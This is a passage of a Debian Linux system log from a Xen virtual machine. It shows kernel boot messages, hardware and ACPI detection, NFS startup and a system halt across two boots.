1098May 15 11:32:35 debian kernel: [ 0.910052] input: Macintosh mouse button emulation as /devices/virtual/input/input0
1099May 15 11:32:35 debian kernel: [ 0.910089] PNP: PS/2 Controller [PNP0303:PS2K,PNP0f13:PS2M] at 0x60,0x64 irq 1,12
1100May 15 11:32:35 debian kernel: [ 0.912030] serio: i8042 KBD port at 0x60,0x64 irq 1
1101May 15 11:32:35 debian kernel: [ 0.912048] serio: i8042 AUX port at 0x60,0x64 irq 12
1102May 15 11:32:35 debian kernel: [ 0.912117] mice: PS/2 mouse device common for all mice
1103May 15 11:32:35 debian kernel: [ 0.912500] rtc_cmos 00:05: rtc core: registered rtc_cmos as rtc0
1104May 15 11:32:35 debian kernel: [ 0.912651] rtc0: alarms up to one day, 114 bytes nvram, hpet irqs
1105May 15 11:32:35 debian kernel: [ 0.912658] cpuidle: using governor ladder
1106May 15 11:32:35 debian kernel: [ 0.912659] cpuidle: using governor menu
1107May 15 11:32:35 debian kernel: [ 0.912663] No iBFT detected.
1108May 15 11:32:35 debian kernel: [ 0.913109] input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input1
1109May 15 11:32:35 debian kernel: [ 0.913149] TCP cubic registered
1110May 15 11:32:35 debian kernel: [ 0.913401] NET: Registered protocol family 10
1111May 15 11:32:35 debian kernel: [ 0.913919] Mobile IPv6
1112May 15 11:32:35 debian kernel: [ 0.913921] NET: Registered protocol family 17
1113May 15 11:32:35 debian kernel: [ 0.913982] registered taskstats version 1
1114May 15 11:32:35 debian kernel: [ 0.914520] XENBUS: Device with no driver: device/vbd/768
1115May 15 11:32:35 debian kernel: [ 0.914521] XENBUS: Device with no driver: device/vbd/51728
1116May 15 11:32:35 debian kernel: [ 0.914522] XENBUS: Device with no driver: device/vbd/51744
1117May 15 11:32:35 debian kernel: [ 0.914523] XENBUS: Device with no driver: device/vif/0
1118May 15 11:32:35 debian kernel: [ 0.914524] XENBUS: Device with no driver: device/console/0
1119May 15 11:32:35 debian kernel: [ 0.914615] rtc_cmos 00:05: setting system clock to 2020-05-15 15:32:28 UTC (1589556748)
1120May 15 11:32:35 debian kernel: [ 0.914637] Initalizing network drop monitor service
1121May 15 11:32:35 debian kernel: [ 0.914715] Freeing unused kernel memory: 592k freed
1122May 15 11:32:35 debian kernel: [ 0.914839] Write protecting the kernel read-only data: 4236k
1123May 15 11:32:35 debian kernel: [ 0.927946] udev[78]: starting version 164
1124May 15 11:32:35 debian kernel: [ 0.951102] SCSI subsystem initialized
1125May 15 11:32:35 debian kernel: [ 0.952802] Initialising Xen virtual ethernet driver.
1126May 15 11:32:35 debian kernel: [ 0.962944] xvda: xvda1 xvda2 < xvda5 >
1127May 15 11:32:35 debian kernel: [ 0.966729] blkfront: xvdb: barriers enabled
1128May 15 11:32:35 debian kernel: [ 0.966929] xvdb:
1129May 15 11:32:35 debian kernel: [ 0.967282] unknown partition table
1130May 15 11:32:35 debian kernel: [ 0.968819] blkfront: xvdc: barriers enabled
1131May 15 11:32:35 debian kernel: [ 0.969086] xvdc: unknown partition table
1132May 15 11:32:35 debian kernel: [ 0.969540] scsi0 : ata_piix
1133May 15 11:32:35 debian kernel: [ 0.969713] scsi1 : ata_piix
1134May 15 11:32:35 debian kernel: [ 0.969759] ata1: PATA max MWDMA2 cmd 0x1f0 ctl 0x3f6 bmdma 0xc100 irq 14
1135May 15 11:32:35 debian kernel: [ 0.969761] ata2: PATA max MWDMA2 cmd 0x170 ctl 0x376 bmdma 0xc108 irq 15
1136May 15 11:32:35 debian kernel: [ 0.979084] FDC 0 is a S82078B
1137May 15 11:32:35 debian kernel: [ 1.176074] PM: Starting manual resume from disk
1138May 15 11:32:35 debian kernel: [ 1.185140] kjournald starting. Commit interval 5 seconds
1139May 15 11:32:35 debian kernel: [ 1.185151] EXT3-fs: mounted filesystem with ordered data mode.
1140May 15 11:32:35 debian kernel: [ 2.289584] udev[339]: starting version 164
1141May 15 11:32:35 debian kernel: [ 2.332372] input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input2
1142May 15 11:32:35 debian kernel: [ 2.332379] ACPI: Power Button [PWRF]
1143May 15 11:32:35 debian kernel: [ 2.332437] input: Sleep Button as /devices/LNXSYSTM:00/LNXSLPBN:00/input/input3
1144May 15 11:32:35 debian kernel: [ 2.332441] ACPI: Sleep Button [SLPF]
1145May 15 11:32:35 debian kernel: [ 2.343205] processor LNXCPU:00: registered as cooling_device0
1146May 15 11:32:35 debian kernel: [ 2.343475] processor LNXCPU:01: registered as cooling_device1
1147May 15 11:32:35 debian kernel: [ 2.343728] processor LNXCPU:02: registered as cooling_device2
1148May 15 11:32:35 debian kernel: [ 2.343982] processor LNXCPU:03: registered as cooling_device3
1149May 15 11:32:35 debian kernel: [ 2.360726] input: PC Speaker as /devices/platform/pcspkr/input/input4
1150May 15 11:32:35 debian kernel: [ 2.820623] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input5
1151May 15 11:32:35 debian kernel: [ 5.629383] Adding 901112k swap on /dev/xvda5. Priority:-1 extents:1 across:901112k SS
1152May 15 11:32:35 debian kernel: [ 5.775956] EXT3 FS on xvda1, internal journal
1153May 15 11:32:35 debian kernel: [ 5.798673] loop: module loaded
1154May 15 11:32:35 debian kernel: [ 6.580711] RPC: Registered udp transport module.
1155May 15 11:32:35 debian kernel: [ 6.580713] RPC: Registered tcp transport module.
1156May 15 11:32:35 debian kernel: [ 6.580714] RPC: Registered tcp NFSv4.1 backchannel transport module.
1157May 15 11:32:35 debian kernel: [ 6.591513] Slow work thread pool: Starting up
1158May 15 11:32:35 debian kernel: [ 6.591740] Slow work thread pool: Ready
1159May 15 11:32:35 debian kernel: [ 6.591793] FS-Cache: Loaded
1160May 15 11:32:35 debian kernel: [ 6.605817] FS-Cache: Netfs 'nfs' registered for caching
1161May 15 11:32:35 debian kernel: [ 6.616039] Installing knfsd (copyright (C) 1996 okir@monad.swb.de).
1162May 15 11:32:35 debian kernel: [ 7.490118] svc: failed to register lockdv1 RPC service (errno 97).
1163May 15 11:32:35 debian kernel: [ 7.491624] NFSD: Using /var/lib/nfs/v4recovery as the NFSv4 state recovery directory
1164May 15 11:32:35 debian kernel: [ 7.492030] NFSD: starting 90-second grace period
1165May 15 11:35:57 debian shutdown[2323]: shutting down for system halt
1166May 15 11:35:58 debian kernel: [ 211.362471] nfsd: last server has exited, flushing export cache
1167May 15 11:36:04 debian kernel: Kernel logging (proc) stopped.
1168May 15 11:36:04 debian rsyslogd: [origin software="rsyslogd" swVersion="4.6.4" x-pid="1418" x-info="http://www.rsyslog.com"] exiting on signal 15.
1169Jan 17 19:55:44 debian kernel: imklog 4.6.4, log source = /proc/kmsg started.
1170Jan 17 19:55:44 debian rsyslogd: [origin software="rsyslogd" swVersion="4.6.4" x-pid="1562" x-info="http://www.rsyslog.com"] (re)start
1171Jan 17 19:55:44 debian kernel: [ 0.000000] Initializing cgroup subsys cpuset
1172Jan 17 19:55:44 debian kernel: [ 0.000000] Initializing cgroup subsys cpu
1173Jan 17 19:55:44 debian kernel: [ 0.000000] Linux version 2.6.32-5-amd64 (Debian 2.6.32-48squeeze6) (jmm@debian.org) (gcc version 4.3.5 (Debian 4.3.5-4) ) #1 SMP Tue May 13 16:34:35 UTC 2014
1174Jan 17 19:55:44 debian kernel: [ 0.000000] Command line: BOOT_IMAGE=/boot/vmlinuz-2.6.32-5-amd64 root=UUID=be5bb36f-7bb4-4900-b459-196278f714b6 ro quiet console=ttyS0
1175Jan 17 19:55:44 debian kernel: [ 0.000000] KERNEL supported cpus:
1176Jan 17 19:55:44 debian kernel: [ 0.000000] Intel GenuineIntel
1177Jan 17 19:55:44 debian kernel: [ 0.000000] AMD AuthenticAMD
1178Jan 17 19:55:44 debian kernel: [ 0.000000] Centaur CentaurHauls
1179Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-provided physical RAM map:
1180Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 0000000000000000 - 000000000009e000 (usable)
1181Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 000000000009e000 - 00000000000a0000 (reserved)
1182Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 00000000000e0000 - 0000000000100000 (reserved)
1183Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 0000000000100000 - 0000000020000000 (usable)
1184Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 00000000fc000000 - 0000000100000000 (reserved)
1185Jan 17 19:55:44 debian kernel: [ 0.000000] DMI 2.7 present.
1186Jan 17 19:55:44 debian kernel: [ 0.000000] last_pfn = 0x20000 max_arch_pfn = 0x400000000
1187Jan 17 19:55:44 debian kernel: [ 0.000000] x86 PAT enabled: cpu 0, old 0x7040600070406, new 0x7010600070106
1188Jan 17 19:55:44 debian kernel: [ 0.000000] init_memory_mapping: 0000000000000000-0000000020000000
1189Jan 17 19:55:44 debian kernel: [ 0.000000] RAMDISK: 17759000 - 1803fa59
1190Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: RSDP 00000000000ea020 00024 (v02 Xen)
1191Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: XSDT 00000000fc00e2a0 00054 (v01 Xen HVM 00000000 HVML 00000000)
1192Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: FACP 00000000fc00df60 000F4 (v04 Xen HVM 00000000 HVML 00000000)
1193Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: DSDT 00000000fc0021c0 0BD19 (v02 Xen HVM 00000000 INTL 20090123)
1194Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: FACS 00000000fc002180 00040
1195Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: APIC 00000000fc00e060 000D8 (v02 Xen HVM 00000000 HVML 00000000)
1196Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: HPET 00000000fc00e1b0 00038 (v01 Xen HVM 00000000 HVML 00000000)
1197Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: WAET 00000000fc00e1f0 00028 (v01 Xen HVM 00000000 HVML 00000000)
1198Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: SSDT 00000000fc00e220 00031 (v02 Xen HVM 00000000 INTL 20090123)
1199Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: SSDT 00000000fc00e260 00033 (v02 Xen HVM 00000000 INTL 20090123)
1200Jan 17 19:55:44 debian kernel: [ 0.000000] No NUMA configuration found
1201Jan 17 19:55:44 debian kernel: [ 0.000000] Faking a node at 0000000000000000-0000000020000000
1202Jan 17 19:55:44 debian kernel: [ 0.000000] Bootmem setup node 0 0000000000000000-0000000020000000
1203Jan 17 19:55:44 debian kernel: [ 0.000000] NODE_DATA [0000000000008000 - 000000000000ffff]
1204Jan 17 19:55:44 debian kernel: [ 0.000000] bootmap [0000000000010000 - 0000000000013fff] pages 4
1205Jan 17 19:55:44 debian kernel: [ 0.000000] (6 early reservations) ==> bootmem [0000000000 - 0020000000]
1206Jan 17 19:55:44 debian kernel: [ 0.000000] #0 [0000000000 - 0000001000] BIOS data page ==> [0000000000 - 0000001000]
1207Jan 17 19:55:44 debian kernel: [ 0.000000] #1 [0000006000 - 0000008000] TRAMPOLINE ==> [0000006000 - 0000008000]
1208Jan 17 19:55:44 debian kernel: [ 0.000000] #2 [0001000000 - 00016d7584] TEXT DATA BSS ==> [0001000000 - 00016d7584]
1209Jan 17 19:55:44 debian kernel: [ 0.000000] #3 [0017759000 - 001803fa59] RAMDISK ==> [0017759000 - 001803fa59]
1210Jan 17 19:55:44 debian kernel: [ 0.000000] #4 [000009e000 - 0000100000] BIOS reserved ==> [000009e000 - 0000100000]
1211Jan 17 19:55:44 debian kernel: [ 0.000000] #5 [00016d8000 - 00016d80c8] BRK ==> [00016d8000 - 00016d80c8]
1212Jan 17 19:55:44 debian kernel: [ 0.000000] found SMP MP-table at [ffff8800000fbc50] fbc50
1213Jan 17 19:55:44 debian kernel: [ 0.000000] Zone PFN ranges:
1214Jan 17 19:55:44 debian kernel: [ 0.000000] DMA 0x00000000 -> 0x00001000
1215Jan 17 19:55:44 debian kernel: [ 0.000000] DMA32 0x00001000 -> 0x00100000
1216Jan 17 19:55:44 debian kernel: [ 0.000000] Normal 0x00100000 -> 0x00100000
1217Jan 17 19:55:44 debian kernel: [ 0.000000] Movable zone start PFN for each node
1218Jan 17 19:55:44 debian kernel: [ 0.000000] early_node_map[2] active PFN ranges
1219Jan 17 19:55:44 debian kernel: [ 0.000000] 0: 0x00000000 -> 0x0000009e
1220Jan 17 19:55:44 debian kernel: [ 0.000000] 0: 0x00000100 -> 0x00020000
1221Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: PM-Timer IO Port: 0xb008
1222Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled)
1223Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x01] lapic_id[0x00] disabled)
1224Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x02] lapic_id[0x00] disabled)
1225Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x03] lapic_id[0x00] disabled)
1226Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x04] lapic_id[0x00] disabled)
1227Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x05] lapic_id[0x00] disabled)
1228Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x06] lapic_id[0x00] disabled)
1229Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x07] lapic_id[0x00] disabled)
1230Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x08] lapic_id[0x00] disabled)
1231Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x09] lapic_id[0x00] disabled)
1232Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0a] lapic_id[0x00] disabled)
1233Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0b] lapic_id[0x00] disabled)
1234Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0c] lapic_id[0x00] disabled)
1235Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0d] lapic_id[0x00] disabled)
1236Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0e] lapic_id[0x00] disabled)
1237Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: IOAPIC (id[0x01] address[0xfec00000] gsi_base[0])
1238Jan 17 19:55:44 debian kernel: [ 0.000000] IOAPIC[0]: apic_id 1, version 17, address 0xfec00000, GSI 0-47
1239Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl)
1240Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 5 global_irq 5 low level)
1241Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 10 global_irq 10 low level)
1242Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 11 global_irq 11 low level)
1243Jan 17 19:55:44 debian kernel: [ 0.000000] Using ACPI (MADT) for SMP configuration information
1244Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: HPET id: 0x8086a201 base: 0xfed00000
1245Jan 17 19:55:44 debian kernel: [ 0.000000] SMP: Allowing 15 CPUs, 14 hotplug CPUs
1246Jan 17 19:55:44 debian kernel: [ 0.000000] Xen version 4.2.
1247Jan 17 19:55:44 debian kernel: [ 0.000000] Netfront and the Xen platform PCI driver have been compiled for this kernel: unplug emulated NICs.
1248Jan 17 19:55:44 debian kernel: [ 0.000000] Blkfront and the Xen platform PCI driver have been compiled for this kernel: unplug emulated disks.
1249Jan 17 19:55:44 debian kernel: [ 0.000000] You might have to change the root device
1250Jan 17 19:55:44 debian kernel: [ 0.000000] from /dev/hd[a-d] to /dev/xvd[a-d]
1251Jan 17 19:55:44 debian kernel: [ 0.000000] in your root= kernel command line option
1252Jan 17 19:55:44 debian kernel: [ 0.000000] PM: Registered nosave memory: 000000000009e000 - 00000000000a0000
1253Jan 17 19:55:44 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000000a0000 - 00000000000e0000
1254Jan 17 19:55:44 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000000e0000 - 0000000000100000
1255Jan 17 19:55:44 debian kernel: [ 0.000000] Allocating PCI resources starting at 20000000 (gap: 20000000:dc000000)
1256Jan 17 19:55:44 debian kernel: [ 0.000000] Booting paravirtualized kernel on Xen
1257Jan 17 19:55:44 debian kernel: [ 0.000000] NR_CPUS:512 nr_cpumask_bits:512 nr_cpu_ids:15 nr_node_ids:1
1258Jan 17 19:55:44 debian kernel: [ 0.000000] PERCPU: Embedded 30 pages/cpu @ffff880001800000 s90392 r8192 d24296 u131072
1259Jan 17 19:55:44 debian kernel: [ 0.000000] pcpu-alloc: s90392 r8192 d24296 u131072 alloc=1*2097152
1260Jan 17 19:55:44 debian kernel: [ 0.000000] pcpu-alloc: [0] 00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 --
1261Jan 17 19:55:44 debian kernel: [ 0.000000] Built 1 zonelists in Node order, mobility grouping on. Total pages: 129081
1262Jan 17 19:55:44 debian kernel: [ 0.000000] Policy zone: DMA32
1263Jan 17 19:55:44 debian kernel: [ 0.000000] Kernel command line: BOOT_IMAGE=/boot/vmlinuz-2.6.32-5-amd64 root=UUID=be5bb36f-7bb4-4900-b459-196278f714b6 ro quiet console=ttyS0
1264Jan 17 19:55:44 debian kernel: [ 0.000000] PID hash table entries: 2048 (order: 2, 16384 bytes)
1265Jan 17 19:55:44 debian kernel: [ 0.000000] Initializing CPU#0
1266Jan 17 19:55:44 debian kernel: [ 0.000000] xsave/xrstor: enabled xstate_bv 0x7, cntxt size 0x340
1267Jan 17 19:55:44 debian kernel: [ 0.000000] Checking aperture...
1268Jan 17 19:55:44 debian kernel: [ 0.000000] No AGP bridge found
1269Jan 17 19:55:44 debian kernel: [ 0.000000] Memory: 497460k/524288k available (3087k kernel code, 392k absent, 26436k reserved, 2036k data, 592k init)
1270Jan 17 19:55:44 debian kernel: [ 0.000000] SLUB: Genslabs=14, HWalign=64, Order=0-3, MinObjects=0, CPUs=15, Nodes=1
1271Jan 17 19:55:44 debian kernel: [ 0.000000] Hierarchical RCU implementation.
1272Jan 17 19:55:44 debian kernel: [ 0.000000] NR_IRQS:4352 nr_irqs:936
1273Jan 17 19:55:44 debian kernel: [ 0.000000] Xen HVM callback vector for event delivery is enabled
1274Jan 17 19:55:44 debian kernel: [ 0.000000] Console: colour VGA+ 80x25
1275Jan 17 19:55:44 debian kernel: [ 0.000000] console [ttyS0] enabled
1276Jan 17 19:55:44 debian kernel: [ 0.000000] Detected 2400.068 MHz processor.
1277Jan 17 19:55:44 debian kernel: [ 0.008000] Calibrating delay loop (skipped), value calculated using timer frequency.. 4800.13 BogoMIPS (lpj=9600272)
1278Jan 17 19:55:44 debian kernel: [ 0.008000] Security Framework initialized
1279Jan 17 19:55:44 debian kernel: [ 0.008000] SELinux: Disabled at boot.
1280Jan 17 19:55:44 debian kernel: [ 0.008000] Dentry cache hash table entries: 65536 (order: 7, 524288 bytes)
1281Jan 17 19:55:44 debian kernel: [ 0.008000] Inode-cache hash table entries: 32768 (order: 6, 262144 bytes)
1282Jan 17 19:55:44 debian kernel: [ 0.008000] Mount-cache hash table entries: 256
1283Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys ns
1284Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys cpuacct
1285Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys devices
1286Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys freezer
1287Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys net_cls
1288Jan 17 19:55:44 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
1289Jan 17 19:55:44 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
1290Jan 17 19:55:44 debian kernel: [ 0.008000] CPU: L2 cache: 256K
1291Jan 17 19:55:44 debian kernel: [ 0.008000] CPU: L3 cache: 30720K
1292Jan 17 19:55:44 debian kernel: [ 0.008000] CPU 0/0x0 -> Node 0
1293Jan 17 19:55:44 debian kernel: [ 0.008000] mce: CPU supports 2 MCE banks
1294Jan 17 19:55:44 debian kernel: [ 0.008000] Performance Events: unsupported p6 CPU model 63 no PMU driver, software events only.
1295Jan 17 19:55:44 debian kernel: [ 0.008000] SMP alternatives: switching to UP code
1296Jan 17 19:55:44 debian kernel: [ 0.024870] ACPI: Core revision 20090903
1297Jan 17 19:55:44 debian kernel: [ 0.027609] Not enabling x2apic, Intr-remapping init failed.
1298Jan 17 19:55:44 debian kernel: [ 0.027611] Setting APIC routing to physical flat
1299Jan 17 19:55:44 debian kernel: [ 0.028367] ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=0 pin2=0
1300Jan 17 19:55:44 debian kernel: [ 0.132003] CPU0: Intel(R) Xeon(R) CPU E5-2676 v3 @ 2.40GHz stepping 02
1301Jan 17 19:55:44 debian kernel: [ 0.132019] installing Xen timer for CPU 0
1302Jan 17 19:55:44 debian kernel: [ 0.132127] Brought up 1 CPUs
1303Jan 17 19:55:44 debian kernel: [ 0.132129] Total of 1 processors activated (4800.13 BogoMIPS).
1304Jan 17 19:55:44 debian kernel: [ 0.132599] devtmpfs: initialized
1305Jan 17 19:55:44 debian kernel: [ 0.134154] regulator: core version 0.5
1306Jan 17 19:55:44 debian kernel: [ 0.134187] NET: Registered protocol family 16
1307Jan 17 19:55:44 debian kernel: [ 0.134277] ACPI: bus type pci registered
1308Jan 17 19:55:44 debian kernel: [ 0.134781] PCI: Using configuration type 1 for base access
1309Jan 17 19:55:44 debian kernel: [ 0.134964] bio: create slab <bio-0> at 0
1310Jan 17 19:55:44 debian kernel: [ 0.180504] ACPI: Interpreter enabled
1311Jan 17 19:55:44 debian kernel: [ 0.180506] ACPI: (supports S0 S3 S4 S5)
1312Jan 17 19:55:44 debian kernel: [ 0.180517] ACPI: Using IOAPIC for interrupt routing
1313Jan 17 19:55:44 debian kernel: [ 0.264015] ACPI: No dock devices found.
1314Jan 17 19:55:44 debian kernel: [ 0.264190] ACPI: PCI Root Bridge [PCI0] (0000:00)
1315Jan 17 19:55:44 debian kernel: [ 0.270647] * Found PM-Timer Bug on the chipset. Due to workarounds for a bug,
1316Jan 17 19:55:44 debian kernel: [ 0.270648] * this clock source is slow. Consider trying other clock sources
1317Jan 17 19:55:44 debian kernel: [ 0.272151] pci 0000:00:01.3: quirk: region b000-b03f claimed by PIIX4 ACPI
1318Jan 17 19:55:44 debian kernel: [ 0.535472] ACPI: PCI Interrupt Link [LNKA] (IRQs *5 10 11)
1319Jan 17 19:55:44 debian kernel: [ 0.535913] ACPI: PCI Interrupt Link [LNKB] (IRQs 5 *10 11)
1320Jan 17 19:55:44 debian kernel: [ 0.536298] ACPI: PCI Interrupt Link [LNKC] (IRQs 5 10 *11)
1321Jan 17 19:55:44 debian kernel: [ 0.536733] ACPI: PCI Interrupt Link [LNKD] (IRQs *5 10 11)
1322Jan 17 19:55:44 debian kernel: [ 0.537047] vgaarb: device added: PCI:0000:00:02.0,decodes=io+mem,owns=io+mem,locks=none
1323Jan 17 19:55:44 debian kernel: [ 0.537049] vgaarb: loaded
1324Jan 17 19:55:44 debian kernel: [ 0.537091] PCI: Using ACPI for IRQ routing
1325Jan 17 19:55:44 debian kernel: [ 0.537927] HPET: 3 timers in total, 0 timers will be used for per-cpu timer
1326Jan 17 19:55:44 debian kernel: [ 0.537942] hpet0: at MMIO 0xfed00000, IRQs 2, 8, 0
1327Jan 17 19:55:44 debian kernel: [ 0.537944] hpet0: 3 comparators, 64-bit 62.500000 MHz counter
1328Jan 17 19:55:44 debian kernel: [ 0.544013] Switching to clocksource xen
1329Jan 17 19:55:44 debian kernel: [ 0.544701] pnp: PnP ACPI init
1330Jan 17 19:55:44 debian kernel: [ 0.544706] ACPI: bus type pnp registered
1331Jan 17 19:55:44 debian kernel: [ 0.616781] pnp: PnP ACPI: found 12 devices
1332Jan 17 19:55:44 debian kernel: [ 0.616783] ACPI: ACPI bus type pnp unregistered
1333Jan 17 19:55:44 debian kernel: [ 0.616790] system 00:00: iomem range 0x0-0x9ffff could not be reserved
1334Jan 17 19:55:44 debian kernel: [ 0.616794] system 00:03: ioport range 0x8a0-0x8a3 has been reserved
1335Jan 17 19:55:44 debian kernel: [ 0.616795] system 00:03: ioport range 0xcc0-0xccf has been reserved
1336Jan 17 19:55:44 debian kernel: [ 0.616797] system 00:03: ioport range 0x4d0-0x4d1 has been reserved
1337Jan 17 19:55:44 debian kernel: [ 0.616801] system 00:0b: ioport range 0x10c0-0x1141 has been reserved
1338Jan 17 19:55:44 debian kernel: [ 0.616802] system 00:0b: ioport range 0xb044-0xb047 has been reserved
1339Jan 17 19:55:44 debian kernel: [ 0.629103] NET: Registered protocol family 2
1340Jan 17 19:55:44 debian kernel: [ 0.629154] IP route cache hash table entries: 4096 (order: 3, 32768 bytes)
1341Jan 17 19:55:44 debian kernel: [ 0.629278] TCP established hash table entries: 16384 (order: 6, 262144 bytes)
1342Jan 17 19:55:44 debian kernel: [ 0.629319] TCP bind hash table entries: 16384 (order: 6, 262144 bytes)
1343Jan 17 19:55:44 debian kernel: [ 0.629351] TCP: Hash tables configured (established 16384 bind 16384)
1344Jan 17 19:55:44 debian kernel: [ 0.629352] TCP reno registered
1345Jan 17 19:55:44 debian kernel: [ 0.629438] NET: Registered protocol family 1
1346Jan 17 19:55:44 debian kernel: [ 0.629446] pci 0000:00:00.0: Limiting direct PCI/PCI transfers
1347Jan 17 19:55:44 debian kernel: [ 0.629540] pci 0000:00:01.0: PIIX3: Enabling Passive Release
1348Jan 17 19:55:44 debian kernel: [ 0.629605] pci 0000:00:01.0: Activating ISA DMA hang workarounds
1349Jan 17 19:55:44 debian kernel: [ 0.629702] Unpacking initramfs...
1350Jan 17 19:55:44 debian kernel: [ 1.002144] Freeing initrd memory: 9114k freed
1351Jan 17 19:55:44 debian kernel: [ 1.004042] audit: initializing netlink socket (disabled)
1352Jan 17 19:55:44 debian kernel: [ 1.004049] type=2000 audit(1610931219.820:1): initialized
1353Jan 17 19:55:44 debian kernel: [ 1.022606] HugeTLB registered 2 MB page size, pre-allocated 0 pages
1354Jan 17 19:55:44 debian kernel: [ 1.023264] VFS: Disk quotas dquot_6.5.2
1355Jan 17 19:55:44 debian kernel: [ 1.023291] Dquot-cache hash table entries: 512 (order 0, 4096 bytes)
1356Jan 17 19:55:44 debian kernel: [ 1.023338] msgmni has been set to 989
1357Jan 17 19:55:44 debian kernel: [ 1.023438] alg: No test for stdrng (krng)
1358Jan 17 19:55:44 debian kernel: [ 1.023465] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 253)
1359Jan 17 19:55:44 debian kernel: [ 1.023466] io scheduler noop registered
1360Jan 17 19:55:44 debian kernel: [ 1.023467] io scheduler anticipatory registered
1361Jan 17 19:55:44 debian kernel: [ 1.023468] io scheduler deadline registered
1362Jan 17 19:55:44 debian kernel: [ 1.023502] io scheduler cfq registered (default)
1363Jan 17 19:55:44 debian kernel: [ 1.023726] xen-platform-pci 0000:00:03.0: PCI INT A -> GSI 28 (level, low) -> IRQ 28
1364Jan 17 19:55:44 debian kernel: [ 1.023752] Grant table initialized
1365Jan 17 19:55:44 debian kernel: [ 1.025195] Linux agpgart interface v0.103
1366Jan 17 19:55:44 debian kernel: [ 1.025212] Serial: 8250/16550 driver, 4 ports, IRQ sharing enabled
1367Jan 17 19:55:44 debian kernel: [ 1.026935] serial8250: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
1368Jan 17 19:55:44 debian kernel: [ 1.029317] 00:0a: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
1369Jan 17 19:55:44 debian kernel: [ 1.029436] input: Macintosh mouse button emulation as /devices/virtual/input/input0
1370Jan 17 19:55:44 debian kernel: [ 1.029494] PNP: PS/2 Controller [PNP0303:PS2K,PNP0f13:PS2M] at 0x60,0x64 irq 1,12
1371Jan 17 19:55:44 debian kernel: [ 1.032600] serio: i8042 KBD port at 0x60,0x64 irq 1
1372Jan 17 19:55:44 debian kernel: [ 1.032603] serio: i8042 AUX port at 0x60,0x64 irq 12
1373Jan 17 19:55:44 debian kernel: [ 1.032657] mice: PS/2 mouse device common for all mice
1374Jan 17 19:55:44 debian kernel: [ 1.033794] input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input1
1375Jan 17 19:55:44 debian kernel: [ 1.034500] rtc_cmos 00:05: rtc core: registered rtc_cmos as rtc0
1376Jan 17 19:55:44 debian kernel: [ 1.034576] rtc0: alarms up to one day, 114 bytes nvram, hpet irqs
1377Jan 17 19:55:44 debian kernel: [ 1.034582] cpuidle: using governor ladder
1378Jan 17 19:55:44 debian kernel: [ 1.034583] cpuidle: using governor menu
1379Jan 17 19:55:44 debian kernel: [ 1.034586] No iBFT detected.
1380Jan 17 19:55:44 debian kernel: [ 1.034763] TCP cubic registered
1381Jan 17 19:55:44 debian kernel: [ 1.034827] NET: Registered protocol family 10
1382Jan 17 19:55:44 debian kernel: [ 1.035237] Mobile IPv6
